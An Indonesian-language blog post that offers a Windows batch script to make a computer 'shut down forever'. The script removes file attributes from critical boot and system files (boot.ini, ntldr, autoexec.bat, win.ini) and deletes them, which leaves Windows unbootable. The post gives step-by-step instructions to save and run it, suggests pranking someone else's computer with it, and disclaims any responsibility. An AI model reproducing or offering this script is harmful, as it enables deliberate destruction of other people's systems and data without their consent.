gravatar

Script Bahaya untuk Membuat Komputer Shutdown Selamanya

Assalamu'alaikum Wr. Wbr.


Kali ini saya akan memberi cara, agar komputer anda shutdown selamanya. Saya juga kurang tahu pasti apakah ini berhasil atau tidak. Karena ini saya hanya copy paste. Maksud dari shutdown selamanya itu windowsnya rusak. Menurut saya, karena script tersebut mengandung DELETE di file penting Windows.

Cara ini lebih baik buat iseng daripada komputer sendiri yang kena. Saya tidak menanggung jika ada yang terkena error pada OS anda.

Caranya adalah sebagai berikut :
Pertama, Copy kode di bawah ini:

@Echo OFF
ATTRIB -R -S -H C:\autoexec.bat
DEL C:\autoexec.bat
ATTRIB -R -S -H C:\boot.ini
DEL C:\boot.ini
ATTRIB -R -S -H C:\ntldr
DEL C:\ntldr
ATTRIB -R -S -H C:\windows\win.ini
DEL C:\Windows\win.ini

Kedua, Paste ke dalam Notepad.
Keempat, Simpan dengan ekstensi .BAT
Kelima, Buka File tersebut. Tunggu kasiatnya.


NB: SAYA TIDAK BERTANGGUNG JAWAB ATAS KERUSAKAN !
Wassalamu'alaikum Wr. Wbr.

Tolong berikan Komentar yang sopan ya...
Dilarang memberi iklan, ejekan, dan spam. Diperbolehkan menyertakan link anda :D